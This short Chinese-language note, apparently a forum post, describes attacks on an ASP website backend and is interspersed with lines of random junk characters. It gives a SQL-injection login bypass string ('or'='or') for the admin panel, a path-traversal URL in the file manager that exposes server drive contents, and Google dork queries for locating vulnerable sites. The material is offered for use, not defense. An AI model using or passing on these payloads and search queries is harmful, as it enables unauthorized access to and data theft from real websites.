后台万能密码 'or'='or'
/ B, P- l% Q' H, ?* I
0 K! Z4 Z& g( r. L& C后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!7 @4 ?! [7 |3 M6 C) d
admin/uploadfile.asp?currentFolder=/upfiles/../
m* G8 z) z$ r6 M w
3 p8 r2 S* F6 E* h' Q漏洞证明:
) f) X6 G2 w3 G" i" S6 d- { ]; @+ G7 |4 e0 y# `
谷歌:inurl:type.asp?id=1 新闻中心( C( c9 u4 ?1 Q2 E
或者 :inurl:download_ok.asp?+ T5 i! w3 F9 K, S
& `& @/ F2 x" Q, k; b W ] M |